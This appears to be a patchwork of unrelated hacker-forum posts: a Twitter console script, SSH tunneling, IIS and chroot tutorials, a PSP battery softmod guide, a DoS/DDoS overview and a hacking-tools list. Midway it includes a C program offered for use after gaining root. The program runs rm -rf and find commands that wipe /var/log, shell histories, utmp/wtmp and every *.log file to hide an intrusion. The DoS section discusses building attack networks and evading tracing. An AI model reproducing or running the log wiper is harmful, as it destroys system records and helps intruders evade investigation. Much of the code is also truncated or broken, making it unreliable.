Twitter Console Version 0.1

this software made by kiddies. this tool can be update status in twitter via console and look friends and waht they status..

this version 0.1 twitter console.

your comment and critical can be sent to my email or give comment here
your comment will be make this tool perfectly


#This tool just for fun
#thanks : mywisdom, gunslinger_, flyff666, petimati, synlord(get your honey dude :p), jimmy, whitehat and you !
#special made : devilzc0de
#email :
#blog : and
#forum thanks : devilzc0de, jasakom, antijasakom, void-labs, and all community
#special thanks: for my lovely(verawati), you always beside me when im sad, fall and happy

import twitter
import time

#twitter connect
print """
#~|~ o_|__|_ _._ |~ _ ._ _ _ | _ /\ '| #
# | \/\/| | | }_| |_(_)| |_\(_)|}_ \/ \/o | #
# #
# twitter console version 0.1 #
# developed by kiddies A.k.A peneter #

user_name = raw_input("please insert your username or email : ")
pass_word = raw_input("please insert your password : ")
connect = twitter.api(username = user_name, password = pass_word)
print "your twitter account was connected"
print "what do you wanna do ? "
print "[1]Update your wall"
print "[2]Look your frieds wall"
choose = raw_input("coose 1 or 2 : ")
if choose == "1":
wall = raw_input("input your wall message : ")
update = connect.PostUpdate(wall)
print "your twitter wall have been updated : %s " % wall
print "Thanks for using Twitter Console"
if choose == "2":
wall_look = connect.GetFriends()
for wall in wall_look:
look = wall.screen_name + wall.status.text
print look
print "[-]Back to Main Menu"

except ImportError:
print "Please check twitter module"
print "Please check your Connection"
print "Please check your username or password, may be those invalid"

Basic Linux security

Computer security has become a critical subject in information technology system these days. If we looked back in history, the security threat has started a long time ago during 1970s when telephone system has been hacked. Many computer crimes happened and as a result, the Computer Fraud and Abuse Act has been made in 1980s. As technology advanced, the evolution of computer networking and the born of Internet, the threats to information and networks have risen significantly. The well-known harassment and destructive attacks are denial of service (DOS), mail bombs and list-linking, viruses, worms and Trojan horses.

Many efforts have been taken to improve computer security including the use of a network and security tools, control user access using permissions and passwords, data encryptions, and virus detectors. Other approaches to improve computer security involve secure operating systems, security architecture, security by design, secure coding and application.
Physical security

The purpose of security is to prevent unauthorized access into the system. This involves securing the physical and network access. Securing the physical access means to limit who can physically access your system, server room and workstations. It's been estimated that 80% of intrusions initiated by insiders. Securing physical access can be made by implementing a restricted area to the network operation centers and developing security policy controls.

Another way of securing the physical access into the system is to secure network hardware such as routers, bridges and switches from local users. Many network hardware have password issue which provide the means to perform onside password recovery. Several steps can be taken such as setting administrative and user password by overwrite the default password, enabled encryption, disable unwanted service such as telnet, and use security utility options if provided by the network hardware.

If your servers and security hardware are secured, intruder will look at other vulnerabilities which are workstation and user. Securing workstation can be made with BIOS and console passwords. For the users part, they must be given security knowledge such as never reveal their password to anyone else, never leave their computer unlock, and so on and alert them with security threats from time to time.
Linux network security

Securing the network access is securing access to the operating system remotely. One of the network security threat is malicious code, such as virus and Trojan which create a backdoor in your system. There are many file integrity checking software available for Linux. Some of them are Tripwire, TAMU, Aide and ATP.

Other network security attack is sniffers and network monitoring tools. Sniffers are very dangerous because they can capture sensitive data such as passwords and confidential information.

Scanners are also a high risk tool use by attacker to scan your system and network. To protect your network and system from scanner you can use a firewall and other tools such as IcmpInfo, scan-detector and klaxon.

Another way of attacking a network is spoofing attack. There are TCP and IP spoofing, ARP spoofing and DNS spoofing.


Tunnel Everything through SSH

n this Tutorial I'll cover how you can tunnel any TCP traffic through an encrypted SSH connection or a SOCKS server, even if a certain program doesn't support proxying of connections natively.

The only requirement for SSH tunneling to work is a shell account on a machine connected to the internet (and, optionally, a HTTP Proxy server). I will refer to this account as your server (it doesn't matter if you may not become root).
Tunneling HTTP

In case you just want to tunnel HTTP traffic (to surf safely, to let the request appear to originate from a different IP and/or to not disclose HTTP clear text passwords to your LAN) best practise is to set up Privoxy on your server. By default, Privoxy binds to (thus only allowing connections from localhost), which is good for us. No configuration must be done for this.

The next step is to establish a tunnel from your computer to your server's Privoxy. That is done with the following SSH command:

ssh -NL 8118:localhost:8118 user@server

This command opens a tunnel on your computer: All connections to port 8118 will be forwarded (encrypted, of course) over the SSH connection and come out at your server's port 8118 (where Privoxy is running).

Once you have established the connection you will want to edit your browser's proxy settings accordingly. Just set the HTTP (and, with some browsers, the HTTPS) proxy to localhost, port 8118.

The great advantage over SOCKS tunneling (see below) is, that even the DNS requests are made from your server. No-one on your LAN can gather information on what kind of site you're surfing. Another advantage is that Privoxy already filters out some advertisements and removes sensitive headers from your requests.
Tunneling Arbitrary Protocols (Dynamic Forward/SOCKS)

If you want to tunnel not just HTTP traffic but arbitrary other TCP protocols as well, a HTTP Proxy isn't adequate any more. Instead, you'll have to set up a SOCKS proxy. That also is possible with SSH:
Setting up the SSH proxy

Setting up the SSH SOCKS proxy is really easy. On your computer, just enter the following command:

ssh -ND 3333 user@server

That command establishes a connection to your server, logs in as user user (you'll have to enter your password though, of course) and then starts a little SOCKS proxy on your server.

On your computer, all connections to port 3333 will be forwarded over the secure SSH channel and will then be forwarded by the proxy to their destination.

Now you'll have to configure the program you want to connect through that tunnel to use localhost, port 3333 as it's SOCKS server (if you have the choice, select SOCKS version 5).

Not many programs support SOCKS proxy forwarding natively (hardly any CLI programs). But there is a workaround for that: tsocks. It enables arbitrary programs which don't support the SOCKS protocol natively to establish connections via a SOCKS server.
How tsocks works

On your computer, install the tsocks program.

I won't go into detail about how this program works, but it basically does the following:

* Before the actual program is loaded tsocks loads its own shared library.
* This library overwrites the kernel's connect() function and replaces it with its own.
* Whenever the program tries to send a request the request is forwarded through your proxy server (and then over the secure tunnel).

All this is done through setting the environment variable LD_PRELOAD to /usr/lib/

The tsocks program itself is just a simple shell wrapper script. All the actual redirecting stuff is done via the library.
Editing the /etc/tsocks.conf

Now you'll have to edit the file /etc/tsocks.conf to relay all connections through your proxy. Open the file and delete all lines. Then enter just the following two lines:

server =
server_port = 3333

If you may not become root ...

... just enter the two lines from above into a file called .tsocks.conf and place it in your home directory. Then, write a little shell script:


exec tsocks "$@"

I call this script viaservername. Place this script in a directory contained in your $PATH and make it executable.
Tunneling Connections

For programs who natively support proxying connections (e.g. Mozilla Firefox) you can now set the proxy address to localhost port 3333. I don't recommend to do that for browsers; instead, use HTTP tunneling (see above).

All other programs which's connections you want to tunnel through your server are prefixed with tsocks. This would look like some of the following program calls (if you wrote a shell script, use that instead of tsocks):

tsocks dog
tsocks netcat 80
tsocks irssi -c -p 6667

If you call tsocks without parameters it executes a shell witht the LD_PRELOAD environment variable already set and exported. That means that every program called from this shell will be redirected through the external server and every subsehll started from this shell will also have the LD_PRELOAD variable set. So if you started tsocks directly after logging in all your traffic would be redirected through your external server.

$ cat =myip
lynx -dump

$ ssh -fND 3333 xxx@feh # -f: goes to background after prompting for password's password:

$ IP=`myip`; host $IP
Address: 84.143.XXX.XXX

$ IP=`tsocks myip`; host $IP
16:15:23 libtsocks(26802): Call to connect received on completed request 3

Have fun!


Making your Home Computer / Dedicated Computer your own Web Server!!!

In this tutorial we will learn how to make your personal web server from a Home Computer or a Dedicated Computer using Windows 2000, Windows XP and Windows 2003. In the end we will have asp and php extensions installed. Also have a very commonly used program called mysql (Database Management) Lets get started!

1. Installing Internet Information Services (IIS)
Note: Have your Windows XP or Windows 2000 CD Inside the CD-Rom Drive. That way it just installs the software with out asking you to place it in.

Start > Settings > Control Panel > Add & Remove Programs
A window is going to pop-up, on the left hand side a button titled "Add/Remove Windows Components"
Another window should pop-up and look something like this:

Next to Application Server (Windows 2003) or Internet Information Services ( Windows XP)
Click so the check mark is showing. (Advanced Installation) Click on detail and select any other software you might want to use later on.
Now click Next and the installation should start.
Once IIS is installed on your machine you can view your home page in a web browser by typing http://localhost
You can also change localhost for the name of your computer or if a dedicated computer use IP address into the address bar of your web browser.

Note: Your default web directory to place your web site in is CInetpub\wwwroot (Place your website files there)

2. Installing PHP & Configuring
Note: Find the latest PHP-Installer at I used PHP 5.0.3 installer [2,267Kb]
Note: First check what IIS# you have installed by going: Start > Settings > Administrative Tools > Internet Information Services (IIS) Manager

On the top right under "Version" Remember that! you will need it when installing php!

Now run the executable installer a pop-up window should come up:

Note: Windows 2003 IIS6, Windows XP IIS5.1, Windows 2000 Unknown
Browse to your desired directory ( I suggest keeping it default for the sake of this tutorial) > Next > Select IIS# > Next
The installation wizard gathers enough information to set up the php.ini file, and configure certain web servers to use PHP.
Once the installation has completed, the installer will inform you if you need to restart your system, restart the server, or just start using PHP.
Note: This istaller configures your Internet Information Services (IIS)

Make a php page "phpinfo.php" and dump this code inside:

// Show all information, defaults to INFO_ALL

// Show just the module information.
// phpinfo(8) yields identical results.


Save it to: CInetpub\wwwroot open browser to: http://localhost/phpinfo.php

3. Download the latest Mysql Server install from: in my case I downloaded the Recommended version "MySQL 4.1 -- Generally Available (GA) release (recommended)"

Now run the exe and you should get a pop-up window similar to this:

Click Next > Next >
Now there's a section where it ask you to make a account select third one down "Skip Sign-Up"
Click Finish! Now the Configuration Wizard should pop-up Click Next > Detailed Configuration
Now you should be here:

If your running it on your own pc "Select Developer Machine" If on a dedicated server chose "Dedicated MySQL Server Machine"
Click Next > Next > Next
Mysql Server Instance Configuration Section! If your going to run your test site on this chose "Manual Settings and put 10" for a couple of users "Decission Support" If a Dedicated server "Online Transaction Processing" Click Next
Next > Next > Should be here:

Make sure you select "Include Bin Dirrectory in Windows PATH" Click Next!
Now type in your Root Password. Now click Next and Execute.

If you want to go the mile dump something like phpmyadmin in your CInetpub\wwwroot for easy access of your databases.
Note: That's something we wont get into in this tutorial!



Create a Live Windows CD

Take a look at

It guides you how to create a live, bootable CD with Windows on. Once the CD is created, you can use it on any PC (with enough RAM) to run Windows, without even touching the hard drive.

It's easy to do if you know Windows well. I have once of these CD's I made with tools to fix up my PC if it was to ever develop a problem. Very useful indeed.

It's recommended you use Windows 98, but if you have a powerful PC with more than 512MB RAM, you could use Windows Me easily.

Just take note that some of the tools listed in the tutorial have now disappeared from the net, making them hard to find. I will post links to the missing tools when I track them down or upload them to my site.


/*simple code deleting logs from linux please use it after you enter the root access
c0d3r : kiddies A.k.A peneter
email : kecoak2004[at]yahoo[dot]com
visit :
inspirate :mywisdom
isa muhammad said,patriot,cruz3n,n4p5t3r(Founder of anti social community)and you...

greetz:devilzc0de crews n members, ycl,jasakom,anti-jasakom,kecoak-elektronik
anti-social(my private community),leetcoder,voidnetwork,codecall, darkc0de (missing forum n real blackhat forum) n soon..

special thanks:vera you always be mine and otherhand..thanks you always beside me
when im happy,sad and you honey*/

int main()
system("rm -rf /tmp/logs");
system("rm -rf $HISTFILE");
system("rm -rf /root/.ksh_history");
system("rm -rf /root/.bash_history");
system("rm -rf /root/.ksh_history");
system("rm -rf /root/.bash_logout");
system("rm -rf /usr/local/apache/logs");
system("rm -rf /usr/local/apache/log");
system("rm -rf /var/apache/logs");
system("rm -rf /var/apache/log");
system("rm -rf /var/run/utmp");
system("rm -rf /var/logs");
system("rm -rf /var/log");
system("rm -rf /var/adm");
system("rm -rf /etc/wtmp");
system("rm -rf /etc/utmp");
system("find / -name *.bash_history -exec rm -rf {}");
system("find / -name *.bash_logout -exec rm -rf {}");
system("find / -name "log*" -exec rm -rf {}");
system("find / -name *.log -exec rm -rf {}");

chroot shell tutorial

let's say you want a user of your (linux) server to have no access to anything you don't want him/her to use..
but you do want them to be able to log in and do their thing...
you'll need to root jail (chroot) the user.
there are lots of tutorials about chroot and also chrooted shells, but I couldn't find a good one, so I wrote one down while working my way thrue the othere tutorials and howto's..
hope you like it !!

reading and following any or all steps in this tutorial is at your own risk.
I am not responsible for your stupidity !

his tutorial should work on all linux distributions, but i've only tested it on slackware (9.0, 9.1, 10, 10.1 and 10.2)

you'll need the following programs (wich are possibly not installed):


If you can't seem to find or install these, this tutorial is not for you !!

all thrue the tutorial you'll see bold italic lines.. they are supposed to be executed by you
if that didn't say root. you'll need to become root.

in this example the user "luser" will be added and jailed ..
you'll need to be super user (root) to do all this..

let's start by adding the user:
useradd -d /tmp -s /bin/chrootshell luser
this adds the user luser with home folder /tmp with shell

now set his password:
passwd luser

make his home dir:
mkdir /home/luser

now we need to make his shell..
use your favorite editor to paste the following in /bin/chrootshell

# chrootshell spawns chroot shell
# (c) 2003-2005 Anne Jan Brouwer

if [ "$1" = "-c" ]
for parameter in $*
if [ $i -gt 0 ]
let i++
sudo /usr/sbin/chroot /home/$USER /bin/su - $USER -c "$PARAMETERS"
sudo /usr/sbin/chroot /home/$USER /bin/su - $USER

make the "chrootshell" executable..
chmod +x /bin/chrootshell

now, let's go and make the chroot root ;)
we go to the users home dir, wich will become his root
cd /home/luser
note: we will be staying in for the rest of this tut !!!

make the most important folders..
mkdir bin dev etc home lib tmp usr

make the users chrooted home dir
mkdir home/luser
chown luser:users home/luser

make the chrooted tmp dir usable
chmod 777 tmp
chmod +t tmp

let's make the chrooted passwd file
grep root /etc/passwd >> etc/passwd
now we'll need to edit the passwd file to change the lusers chrooted shell and path..
fire up your favorite editor to edit the newly created passwd file.
the line should look a little like this:
luser: x:1020:100::/tmp:/bin/chrootshell
change it to:
luser: x:1020:100::/home/luser:/bin/bash
not that 1020 is the users ID and is propably some other number on your
puter.. don't change it to 1020 just because it said 1020 in my example ok ;)

now we'll make the chrooted group file
grep root /etc/group >> etc/group
grep users /etc/group >> etc/group

we'll copy the standard /etc/profile and needed files you could chose to edit these
cp /etc/profile etc
cp /etc/DIR_COLORS etc
cp /etc/HOSTNAME etc

we'll need to make some much needed devices
mknod -m 0666 dev/tty c 5 0
mknod -m 0644 dev/urandom c 1 9
mknod -m 0666 dev/null c 1 3

let's now make some usefull (compatibility) links and folders..
ln -s bin usr
ln -s lib usr
ln -s lib usr/libexec
mkdir usr/local
ln -s bin usr/local
ln -s lib usr/local
and make the terminfo (needed for a lot of programs) available in the root jail.
mkdir usr/share
cp -r /usr/share/terminfo usr/share

now for the realy fun part...
you'll have to find out some stuff:

1. what do you want the user to be able to use
2. what library's do these executables need
3. what other files will the user be needing

1. what do you want the user to be able to use

the user will need a shell (bash)
the user will need su (because the chrootshell script depends on it)
the user will need basic tools (cp, cat, ls, rm, mv etc.).
you'd want the user to have some other tools (vi, pico, whoami etc..)
you'd like for the user to have dircolors and id (needed if you want to use the standard etc/profile)

copy these files to the users chrooted bin dir
cp `which bash` `which su` `which cp` `which ln` `which ls` `which rm` `which mv` `which cp` `which du` `which cat` `which less` `which vi` `which pico` `which whoami` `which dircolors` `which id` bin
note: the `which bash` part returns the full path of bash (/bin/bash) etc..

2. what library's do these executables need

the command ldd is realy usefull here..
let's take bash for example:
root@server~# ldd `which bash` => /lib/ (0x4001b000) => /lib/ (0x40020000) => /lib/ (0x40023000)
/lib/ => /lib/ (0x40000000)

and copy all the needed libs for each of the programs you chose in step 1 to the chrooted lib dir..

let's first do so for bash
cp /lib/ /lib/ /lib/ /lib/ lib
next the one (on my system) missing for su
cp /lib/ /lib/ /lib/ lib
note that ldd doesn't see that libnss is needed, it is!!
next the ones for ls (only the ones not allready copied ofcourse ;))
cp /lib/ /lib/ lib
cp /lib/ lib
cp /lib/ lib

3. what other files will the user be needing

well this depends on what kind of programs the user is allowed to execute..
there's no real telling what you'll have to give the user to be content..
wait a minute !! the user has to be content with what you give him/her !!

the last step is to add the user to the sudoers file..
open the /etc/sudoers file with your favorite editor or use
add the line:
luser ALL= NOPASSWD: /usr/sbin/chroot /home/luser /bin/su - luser*
save and exit

now to check it out.. try and log in as the newly created luser
ssh -l luser localhost

A lot more info on chroot logins

A nice derived paper can be found at

Another system I'm gonna have to check out is jailkit..

Copyright (c) 2003-2005 by Anne Jan Brouwer (the_JinX).
This work is licensed under a Creative Commons License.
Attribution-ShareAlike 2.0 or later


Trinity Rescue Kit 3.4 released

After more than a year of development, developer Tom Kerremans has announced the release of version 3.4 of the Trinity Rescue Kit (TRK). TRK is a Live distribution – bootable via a LiveCD, LiveUSB or over a network – that's based on Mandriva Linux and is specifically aimed at recovery and repair operations for both Windows and Linux systems. For example, it includes a number of tools for recovering deleted files, resetting passwords and cloning drives.
Trinity Rescue Kit 3.4 uses the latest 2.6.35 Linux kernel and features an updated, easy to use scrollable text menu that provides access to its most commonly used features. Using the NTFS-3G read/write driver, TRK includes full NTFS file system write support. Other features include an application for removing various temporary files from a system, full proxy server support and several updates to the included packages. Five anti-virus programs with online update capabilities are included, integrated into a single uniform command-line, as well as two rootkit detection utilities.
More details about the release can be found in the official release announcement and in the change log. Trinity Rescue Kit 3.4 build 367 is available to download as a 146MB LiveCD from the project's site and online documentation is provided.


PSP Hacking (Softmodding your battery)

This was the tutorial i used when i was first getting into PSP hacking. I did not write this myself, it came origionally from a man named Ben Heck which can found at Ben Heck's Official Site. Most tutorials tell you that you need a second PSP with a custom firmware installed (homebrew) to create a pandora battery and magic memory stick for the PSP that you which to Unbrick. If you dont have access to a second unbricked PSP then this tutorial will help you out like it did for me. I would write this tutorial myself, but most all of the information i have on this method i aquired from this tutorial anyways, so it only makes sence to share the origional.

We will still start off with Q/A (Questions/Answers)

Q)What is Pandora's Battery?
A)Pandora's Battery is a utility that utilizes your memory stick and battery to hack your psp.

Q)There are already a lot of tutorials for this.....what makes yours any different?
A)On most of the tutorials it tells you that you require a psp that has 1.50 or a custom firmware. My tutorial doesnt require the use of a second psp! Just some spare time and a little skill.

Q)Is Pandora's Battery illegal?
A)Pandora's Battery is in no way illegal because it doesnt use any copy written material (rather it be from Sony or a 3rd party application)

Q)What is "Hardmodding"?
A)Hardmodding is a way or modifying something through hardware. (example: modifying a battery)

Q)Why did you update this post?
A)As listed above, i always receive mail because people don't understand some of the processes. So hopefully this newer version will sum things up and make it clearer.

Q)I Cant afford a new battery what can i do?
A)Read the "DA Time Machine section"

Q)Where have you been?
A)Around the world lol. I moved.....

Q)Whats with the pictures and videos?
A)Sorry if the quality isnt that good. If anyone feels they can do better, do so and i will add them and give them their props lol.

Well, with that out of the way, lets get started!!!!

We will now discuss how the tutorial is going to be organized (because organizations is a key factor in many great posts lol)
1)Questions and Answers
2)Materials Required
3)Process #1: Creating the Magic Memory Stick
4)Process #2: Creating the Magic Memory Stick with a bricked psp
5)Process #3: Moving the partitions
6)Process #4: Hardmodding the battery
7)Testing your battery
8)Running the files
9)Tips and Tricks
10)Final Questions
11)Information Links
12)Download Links
13)For Nerds ONLY (how this works)
14)Upgrading Custom Firmware
15)Error Fixing
16)Windows Vista
17)DA Time Machine (This covers how to bypass the ressurection.elf and how to use it)

Now that we understand that, we can now continue with the guide. So first up is "Materials"
(NOTE: The materials will be organized by 1)Name and then by 2)Amount needed)

A psp (1)
A psp battery (2)
A memory stick pro duo with 512MB or more, NO LESS (1)
A mini USB or Memory Card Reader (1)
A computer with an internet connection (1)
A knife/exacto knife (1)
A needle, safety pin, tooth pick, etc (1)
Winrar (see Download Section)

Now i assume that these are common household material (if not you can buy them all at a walmart for about $50 or less)

Process #1: Creating the Magic Memory Stick
(NOTE: this is for working psp's. so if your psp is bricked, you dont have to do this one. just go to the next one)
1)Turn on the psp and go into USB mode
2)Download Winrar (see download section) if you havent already
3)When your computer detects the psp, go to "My Computer"
4)Right-click on your psp's drive and select "Format"
5)Format the memory stick
6)Next download the "universal unbricker" (which is in the download section)
7)Place all the files inside of it onto your psp's drive. These files should include:
==three folders called "PSP", "kd", and "registry"
==three eboots called "150.pbp", "340.pbp", and "371.pbp"
==one bin file called "msipl.bin"

once done with that, move to "Process #3: Moving the Partitions"

Process #2: Creating the Magic Memory Stick with a bricked psp:
In order to do this, we are going to need a Memory card Reader/Writer.
1)Plug your Memory Stick in via Card Reader
2)Follow the above tutorial from step 2-7

Process #3: Moving the Partitions:
(NOTE: Keep your memory stick in through USB or card reader)
1)Download the partition mover
2)Extract the folder "msinst" to your hard drive (C:\)
3)Go to "My Computer" and find your PSP drive letter (Removable Disk ?)
4)Go to "Start"
5)Go to "Run"
6)Type in "cmd" and press OK

from here, there should be a black and silverish white screen. If so, your all good and are ready to continue.

7)Type this in: "cd C:\msinst"
8)Next, type in "msinst ? msipl.bin" (remember No quotes) (also, replace ? with your removable disk letter)(also, use a capital letter to represent your drive. example: C:\msinst>msinst J msipl.bin)
9)It will show some stuff and give you 2 options. 1)Y=Yes 2)N=No........of course, press Y and then enter
10)You should receive a confirmation that the partitions were successfully moved

and thats it! your done with your magic memory stick and partition moving!!!!! That wasnt so hard now was it?
Now, lets continue!

Process #4: Hardmodding the battery:
1)Take your battery and open it using a knife or exacto knife
2)look on the main board for the display "ICO4" or "CO4" (depending on your battery)
3)Now, take a needle or something like that and remove pin #5
here is a diagram: (NOTE: you can find pin #5 easily when the ICO4 or CO4 display is facing you!!!!)
__ (pin 4) __ (pin 8)
__ (pin 3) __ (pin 7)
__ (pin 2) __ (pin 6)
__ (pin 1) __ (pin 5)
a better diagram of it can be found on ben hecks page (see links)
4)After that, put your battery back together.

congratulations, you just softmodded your battery!!!!!

Testing your battery:
Your will know if you successfully made your battery when:
1)you inert the battery and the green power LED comes on
if it doesnt come on, you did now make it correctly!

Running the files:
Once your battery and your memory stick are being used at the same time, you will now have a "Pandora's Battery"
1)put in your magic Memory Stick
2)Put in your softmodded battery
*if you see your wifi LED and memory stick LED blink, you have it working!!!!!!! as though in most occasions your screen wont light up but if it does, thats always good too*
3)When your LED's are don flashing, press "[]" (square) to dump your nand flash (just in case you brick. be warned, the file is anywhere from 32MB-64MB depending on your psp)
4)After that is done, you will be required reboot, so press X (cross) when your LED's are done flashing or when instructed to)
5)Re-put in your battery and the pandora menu will load
6)Press X (cross) to install 3.71M33
7)After thats done, you will need to reboot again (press X (cross) when instructed to or when the LED's are done flashing)
8)Now, remove your battery
9)Plug in your charger
10)Turn on the psp
11)Put in your battery
12)Remove the charger
13)And you should now be running 3.71M33!!!!!

Tips and tricks:
1)Run the v3 universal unbricker when your done so you can see the text (on slim psp's or fat)
2)Buy a new battery (if your cheap, see the 1st question on "Final Questions"
3)Remember NOT ALL homebrew is compatible with the psp slim!!

Final Questions:
(Q)Can i ever dual boot my XMB and my battery
(A)Yes! you can do this only one way. you need to buy a switch and solder on the + and - connector to the batter and to the switch. This will allow you to choose when you want to boot into pandora's battery or into your XMB (see links)

(Q)When i insert my softmodded battery, the psp turns on but i cant see anything
(A)Thats because your probably using a psp slim which in that case, just press X and then install the V3 unbricker

(Q)The light comes on but my MS LED and my wofi LED doesnt do anything
(A)This is a common problem when you dont follow the instruction EXACTLY, you have to re-create the magic memory stick

(Q)Did you create this?
(A)No, i did not. Ben Heck did and all details can be found on his site (see links)

It is also good to mention that this method is for the "fat" psp model, if you own a slim, lift the #4 pin instead of the #5 pin from the battery.

Download Links:
Partition Mover:
Universal Unbricker:

Quick introduction to DoS and DDoS

With the current expansion of Internet worldwide, it became extremely necessary the creation of new forms of attacks by the hacker community, the concept of DoS (Denial of Service) and DDoS (Distributed Denial of Service) was born. This type of attack became popular by targeting entities where the availability of various services is the key to the entity's success as well as the reason for its existence, amongst those entities we can include as examples, Banks, ISP, E-commerce websites, etc.. Where every hour, minute or even second means the possible loss of huge amounts of money.

Pre-Attack and Pre-Requirements

It became, for quite a long time an unsolved puzzle for many security professionals the choice of the best time to create an attack network, pre-target-identification or post-target-identification, for sake of neutrality let's say that the best time depends on the objective to achieve, the attacker's mentality and its skills.
We can easily understand that creating a pre-target-identification attack network that is fully functional at the zero attack hour has the same impact as a post-target-identification attack network of the same size ,power and is completely functional but in reality this is not completely true. A pre-target-identification has to be idle for more time, therefore causing network nodes to become inactive either by a sysadmin covering/fixing/patching the attacker's entry point or by the implementation of more restrictive security measures.
The attack methodology used for the expansion of an attack network have been modified since the earliest *DoS attacks, what started as simple Host-by-host attack and the successive host append to the network turned into a battle of "intelligent" scripts/worms capable of doing the job by their own means without almost no human intervention on the process and with a power far more superior than the individual host attack method.
Once formed the attack network, let's look at the attacker as a pyrotechnic technician with all his fireworks ready to launch and begin the show...The countdown clock reaches zero... The attacker presses the trigger (or some pre scheduled event occurs)... The show begins... But what happens?

Post Attack Analysis

From the uninformed victim's point of view, the attack was apparently conducted by various attackers at the same time, almost like an army that marched towards a castle, the real enemy would be the army's leading person and the army itself would just be the attacker's puppets, this lack of knowledge gives the attacker some time, making the victim go through all of the painful "Back-trace" process which sometimes due to a small budget, the high adjacent cost of the analysis and depending on the dimension of the damages caused can lead to the suspension of the attack's forensics.

Protection layers

It is fairly trivial that the more protection layers exist between the attacker and the victim, more anonymous and protected the attacker's identity will be and more difficulties will the victim run across to unveil the attack source.
An elevated number of layers will, as expected, create "lag" between layers which can lead, if badly idealized, to the total of partial failure of the attack, on the other hand a small number of layers can lead to an easy detection of the attacker and therefore, large prejudice for the attacker, it is, in sum, essential to create a balance between both extremes to obtain a successful attack and effective risk distribution.

Other types of DoS

Examples of other attacks aimed at basic and essential company and individual's resources which are "un-wired" can include amongst others, electrical or telephonic cuts, extreme adverse climate conditions (bearing in mind that this attack is however not controlled by the attacker), access cuts (roads,etc..) and probably the most common used forms, the interception and/or manipulation followed by a negation of information or data transmitted via mail etc..


Top 10 Linux Hacking Tools

For installation of packages for :

Ubuntu: apt-get install program name
Fedora: yum install program name
Open Suse: yum install nessus program name
Debain: apt-get install nessus program name
Gentoo: emerge -v program name
Arch Linux: pacman -S program name
Just Replace program name with the program you want to install. Again if you need any help PM me.

1. Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available.

2. Aircrack :
~The fastest available WEP/WPA cracking tool~
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

3. Nessus :
~Premier UNIX vulnerability assessment tool~
Nessus was a popular free and open source vulnerability scanner until they closed the source code in 2005 and removed the free "registered feed" version in 2008. A limited â€Å“Home Feed” is still available, though it is only licensed for home network use. Some people avoid paying by violating the â€Å“Home Feed” license, or by avoiding feeds entirely and using just the plugins included with each release. But for most users, the cost has increased from free to $1200/year. Despite this, Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

4. Snort :
~Everyone's favorite open source IDS~
This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts.

~Sniffing the glue that holds the Internet together~
Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences).

6. John the Ripper :
~A powerful, flexible, and fast multi-platform password hash cracker~
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here

**NOTE For John the Ripper the program,the name you use is john to install**
eg. apt-get install john

7. Kismet :
~A powerful wireless sniffer~
Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating.

8. Metasploit Framework :
~Hack the Planet~
Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.

***You can not install Metasploit Framework, But you can read about it here**

9. Nikto :
~A more comprehensive web scanner~
Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses Whisker/libwhisker for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected.

10. Netcat :
~The network Swiss army knife~
